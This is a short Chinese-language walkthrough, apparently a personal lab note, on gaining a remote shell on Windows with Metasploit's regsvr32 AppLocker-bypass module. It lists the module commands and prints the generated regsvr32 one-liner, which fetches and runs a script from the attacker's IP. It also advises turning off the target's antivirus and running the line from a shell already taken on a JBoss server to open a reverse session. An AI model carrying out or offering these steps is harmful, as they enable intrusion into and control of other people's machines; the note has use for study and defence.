參考利用文章鏈接:http://www.freebuf.com/articles/terminal/135391.html
http://www.4hou.com/technology/5737.html
Rundll32的利用是通過對註冊動手腳,建立一個會話鏈接W7以上都存在,但是現在殺毒軟件都監控,實驗的時候關閉目標機的
殺毒軟件(如:360)
通過虛擬機打物理機,下圖可以看見同一網段而且是互相可以通訊的
啓動Metasploit
加載漏洞利用模塊:use exploit/windows/misc/regsvr32_applocker_bypass_server
查看需要哪些參數:show options
配置參數運行
得到一個 regsvr32 /s /n /u /i:http://192.168.117.155:8080/S2hYxUgEgmEK9.sct scrobj.dll
結合jeboss抓的服務器如果是Windows的,在獲得的shell 的CMD命令下執行
在回到kail 發現反彈了一個session ,執行session就開啓了一個CMD
結合一些windows的命令執行參考鏈接: http://www.sohu.com/a/199732200_99907709